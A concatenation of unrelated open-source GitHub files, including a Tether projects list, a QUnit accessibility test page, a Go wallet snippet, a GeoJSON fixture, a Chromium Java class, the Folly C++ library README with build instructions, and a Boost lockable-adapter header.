3. Run the [command line interface](../user-guide/command-line-interface.md) using the `--rulesdir` option to specify the location of your runtime rules.
| {
"pile_set_name": "Github"
} |
## Projects Using Tether
Here at HubSpot we have built a bunch of libraries on top of Tether,
both because we wanted Tether-performance, and because we saw opportunities
to improve on what was available in the client-side ecosystem.
### [Select](http://github.hubspot.com/select/docs/welcome)
Select is a replacement for native browser select elements that is fully stylable.
### [Shepherd](http://github.hubspot.com/shepherd/docs/welcome)
Shepherd is a library for making tours of your app to help onboard users and show off
new features.
### [Tooltip](http://github.hubspot.com/tooltip/docs/welcome)
A simple, easy-to-use implementation of tooltips that works well.
### [Drop](http://github.hubspot.com/drop/docs/welcome)
Where Tether does general-purpose positioning, Drop assumes that you are interested
in making something which pops up next to something the user clicks or hovers on.
If you're building something that fits that pattern, Drop can make things a little easier.
### [Blueprint](http://blueprintjs.com/)
A React UI toolkit for the web.
### [Bootstrap 4](http://getbootstrap.com/)
Tooltip and popovers from Bootstrap 4 are positioned using Tether
### [Ember Tether](https://github.com/yapplabs/ember-tether)
An Ember.js-friendly interface for tether.
### [React Datepicker](https://github.com/Hacker0x01/react-datepicker)
A simple and reusable datepicker component for React
### Your Project Here
If you have a cool open-source library built on Tether, PR this doc.
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/xhtml; charset=UTF-8" />
<title>Check #238.3 - Negative</title>
<link rel="stylesheet" href="../../../libs/qunit/qunit.css" media="screen">
</head>
<body>
<form action="http://mysite.com">
<p><input type="image" name="submit" src="renew.gif" alt="renew license" /></p>
</form>
<script id="qunit-jquery" src="../../../libs/jquery/jquery.js"></script>
<script id="qunit-events" src="../../../libs/jquery.hasEventListener/jquery.hasEventListener-2.0.3.js"></script>
<script id="qunit-quail" src="../../../src/quail.js"></script>
<script id="qunit-composite" src="../../composite.js"></script>
<script id="qunit-qunit" src="../../../libs/qunit/qunit.js"></script>
<script></script>
</body>
</html> | {
"pile_set_name": "Github"
} |
package BLC
import "fmt"
func (cli *CLI) createWallet(nodeID string) {
wallets,_ := NewWallets(nodeID)
wallets.CreateNewWallet(nodeID)
fmt.Println(len(wallets.WalletsMap))
}
| {
"pile_set_name": "Github"
} |
{
"type": "FeatureCollection",
"features": [{
"type": "Feature",
"properties": {},
"geometry": {
"type": "Polygon",
"coordinates": [
[[34, 119],
[20, 20],
[132, 141],
[34, 119]]
]
}
},{
"type": "Feature",
"properties": {},
"geometry": {
"type": "Polygon",
"coordinates": [
[[27.681744389656238, 74.32090675542626],
[25.1362898442017, 56.3209067554263],
[35.67034343592924, 56.32090675542627],
[35.67034343592924, 74.32090675542624],
[27.681744389656238, 74.32090675542626]]
]
}
}]
}
| {
"pile_set_name": "Github"
} |
// Copyright 2013 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package org.chromium.content.browser.input;
import org.chromium.ui.DropdownItem;
/**
* Select popup item containing the label, the type and the enabled state
* of an item belonging to a select popup dialog.
*/
public class SelectPopupItem implements DropdownItem {
private final String mLabel;
private final int mType;
public SelectPopupItem(String label, int type) {
mLabel = label;
mType = type;
}
@Override
public String getLabel() {
return mLabel;
}
@Override
public String getSublabel() {
return null;
}
@Override
public int getIconId() {
return NO_ICON;
}
@Override
public boolean isEnabled() {
return mType == PopupItemType.ENABLED || mType == PopupItemType.GROUP;
}
@Override
public boolean isGroupHeader() {
return mType == PopupItemType.GROUP;
}
@Override
public boolean isMultilineLabel() {
return false;
}
public int getType() {
return mType;
}
}
| {
"pile_set_name": "Github"
} |
Folly: Facebook Open-source Library
-----------------------------------
[](https://travis-ci.org/facebook/folly)
### What is `folly`?
Folly (acronymed loosely after Facebook Open Source Library) is a
library of C++14 components designed with practicality and efficiency
in mind. **Folly contains a variety of core library components used extensively
at Facebook**. In particular, it's often a dependency of Facebook's other
open source C++ efforts and place where those projects can share code.
It complements (as opposed to competing against) offerings
such as Boost and of course `std`. In fact, we embark on defining our
own component only when something we need is either not available, or
does not meet the needed performance profile. We endeavor to remove
things from folly if or when `std` or Boost obsoletes them.
Performance concerns permeate much of Folly, sometimes leading to
designs that are more idiosyncratic than they would otherwise be (see
e.g. `PackedSyncPtr.h`, `SmallLocks.h`). Good performance at large
scale is a unifying theme in all of Folly.
### Logical Design
Folly is a collection of relatively independent components, some as
simple as a few symbols. There is no restriction on internal
dependencies, meaning that a given folly module may use any other
folly components.
All symbols are defined in the top-level namespace `folly`, except of
course macros. Macro names are ALL_UPPERCASE and should be prefixed
with `FOLLY_`. Namespace `folly` defines other internal namespaces
such as `internal` or `detail`. User code should not depend on symbols
in those namespaces.
Folly has an `experimental` directory as well. This designation connotes
primarily that we feel the API may change heavily over time. This code,
typically, is still in heavy use and is well tested.
### Physical Design
At the top level Folly uses the classic "stuttering" scheme
`folly/folly` used by Boost and others. The first directory serves as
an installation root of the library (with possible versioning a la
`folly-1.0/`), and the second is to distinguish the library when
including files, e.g. `#include <folly/FBString.h>`.
The directory structure is flat (mimicking the namespace structure),
i.e. we don't have an elaborate directory hierarchy (it is possible
this will change in future versions). The subdirectory `experimental`
contains files that are used inside folly and possibly at Facebook but
not considered stable enough for client use. Your code should not use
files in `folly/experimental` lest it may break when you update Folly.
The `folly/folly/test` subdirectory includes the unittests for all
components, usually named `ComponentXyzTest.cpp` for each
`ComponentXyz.*`. The `folly/folly/docs` directory contains
documentation.
### What's in it?
Because of folly's fairly flat structure, the best way to see what's in it
is to look at the headers in [top level `folly/` directory](https://github.com/facebook/folly/tree/master/folly). You can also
check the [`docs` folder](folly/docs) for documentation, starting with the
[overview](folly/docs/Overview.md).
Folly is published on Github at https://github.com/facebook/folly
### Build Notes
#### Dependencies
folly requires gcc 4.9+ and a version of boost compiled with C++14 support.
googletest is required to build and run folly's tests. You can download
it from https://github.com/google/googletest/archive/release-1.8.0.tar.gz
The following commands can be used to download and install it:
```
wget https://github.com/google/googletest/archive/release-1.8.0.tar.gz && \
tar zxf release-1.8.0.tar.gz && \
rm -f release-1.8.0.tar.gz && \
cd googletest-release-1.8.0 && \
cmake . && \
make && \
make install
```
#### Finding dependencies in non-default locations
If you have boost, gtest, or other dependencies installed in a non-default
location, you can use the `CMAKE_INCLUDE_PATH` and `CMAKE_LIBRARY_PATH`
variables to make CMAKE look also look for header files and libraries in
non-standard locations. For example, to also search the directories
`/alt/include/path1` and `/alt/include/path2` for header files and the
directories `/alt/lib/path1` and `/alt/lib/path2` for libraries, you can invoke
`cmake` as follows:
```
cmake \
-DCMAKE_INCLUDE_PATH=/alt/include/path1:/alt/include/path2 \
-DCMAKE_LIBRARY_PATH=/alt/lib/path1:/alt/lib/path2 ...
```
#### Ubuntu 16.04 LTS
The following packages are required (feel free to cut and paste the apt-get
command below):
```
sudo apt-get install \
g++ \
cmake \
libboost-all-dev \
libevent-dev \
libdouble-conversion-dev \
libgoogle-glog-dev \
libgflags-dev \
libiberty-dev \
liblz4-dev \
liblzma-dev \
libsnappy-dev \
make \
zlib1g-dev \
binutils-dev \
libjemalloc-dev \
libssl-dev \
pkg-config
```
If advanced debugging functionality is required, use:
```
sudo apt-get install \
libunwind8-dev \
libelf-dev \
libdwarf-dev
```
In the folly directory, run:
```
mkdir _build && cd _build
cmake ..
make -j $(nproc)
make install
```
#### OS X (Homebrew)
folly is available as a Formula and releases may be built via `brew install folly`.
You may also use `folly/build/bootstrap-osx-homebrew.sh` to build against `master`:
```
cd folly
./build/bootstrap-osx-homebrew.sh
```
#### OS X (MacPorts)
Install the required packages from MacPorts:
```
sudo port install \
autoconf \
automake \
boost \
gflags \
git \
google-glog \
libevent \
libtool \
lz4 \
lzma \
scons \
snappy \
zlib
```
Download and install double-conversion:
```
git clone https://github.com/google/double-conversion.git
cd double-conversion
cmake -DBUILD_SHARED_LIBS=ON .
make
sudo make install
```
Download and install folly with the parameters listed below:
```
git clone https://github.com/facebook/folly.git
cd folly/folly
autoreconf -ivf
./configure CPPFLAGS="-I/opt/local/include" LDFLAGS="-L/opt/local/lib"
make
sudo make install
```
#### Windows (Vcpkg)
folly is available in [Vcpkg](https://github.com/Microsoft/vcpkg#vcpkg) and releases may be built via `vcpkg install folly:x64-windows`.
You may also use `vcpkg install folly:x64-windows --head` to build against `master`.
#### Other Linux distributions
- double-conversion (https://github.com/google/double-conversion)
Download and build double-conversion.
You may need to tell cmake where to find it.
[double-conversion/] `ln -s src double-conversion`
[folly/] `mkdir build && cd build`
[folly/build/] `cmake "-DCMAKE_INCLUDE_PATH=$DOUBLE_CONVERSION_HOME/include" "-DCMAKE_LIBRARY_PATH=$DOUBLE_CONVERSION_HOME/lib" ..`
[folly/build/] `make`
- additional platform specific dependencies:
Fedora >= 21 64-bit (last tested on Fedora 28 64-bit)
- gcc
- gcc-c++
- cmake
- automake
- boost-devel
- libtool
- lz4-devel
- lzma-devel
- snappy-devel
- zlib-devel
- glog-devel
- gflags-devel
- scons
- double-conversion-devel
- openssl-devel
- libevent-devel
Optional
- libdwarf-dev
- libelf-dev
- libunwind8-dev
| {
"pile_set_name": "Github"
} |
//////////////////////////////////////////////////////////////////////////////
//
// (C) Copyright Vicente J. Botet Escriba 2008-2009,2012. Distributed under the Boost
// Software License, Version 1.0. (See accompanying file
// LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
//
// See http://www.boost.org/libs/thread for documentation.
//
//////////////////////////////////////////////////////////////////////////////
#ifndef BOOST_THREAD_POLY_LOCKABLE_ADAPTER_HPP
#define BOOST_THREAD_POLY_LOCKABLE_ADAPTER_HPP
#include <boost/thread/poly_lockable.hpp>
namespace boost
{
//[poly_basic_lockable_adapter
template <typename Mutex, typename Base=poly_basic_lockable>
class poly_basic_lockable_adapter : public Base
{
public:
typedef Mutex mutex_type;
protected:
mutex_type& mtx() const
{
return mtx_;
}
mutable mutex_type mtx_; /*< mutable so that it can be modified by const functions >*/
public:
BOOST_THREAD_NO_COPYABLE( poly_basic_lockable_adapter) /*< no copyable >*/
poly_basic_lockable_adapter()
{}
void lock()
{
mtx().lock();
}
void unlock()
{
mtx().unlock();
}
};
//]
//[poly_lockable_adapter
template <typename Mutex, typename Base=poly_lockable>
class poly_lockable_adapter : public poly_basic_lockable_adapter<Mutex, Base>
{
public:
typedef Mutex mutex_type;
bool try_lock()
{
return this->mtx().try_lock();
}
};
//]
//[poly_timed_lockable_adapter
template <typename Mutex, typename Base=poly_timed_lockable>
class poly_timed_lockable_adapter: public poly_lockable_adapter<Mutex, Base>
{
public:
typedef Mutex mutex_type;
bool try_lock_until(chrono::system_clock::time_point const & abs_time)
{
return this->mtx().try_lock_until(abs_time);
}
bool try_lock_until(chrono::steady_clock::time_point const & abs_time)
{
return this->mtx().try_lock_until(abs_time);
}
bool try_lock_for(chrono::nanoseconds const & rel_time)
{
return this->mtx().try_lock_for(rel_time);
}
};
//]
}
#endif
| {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.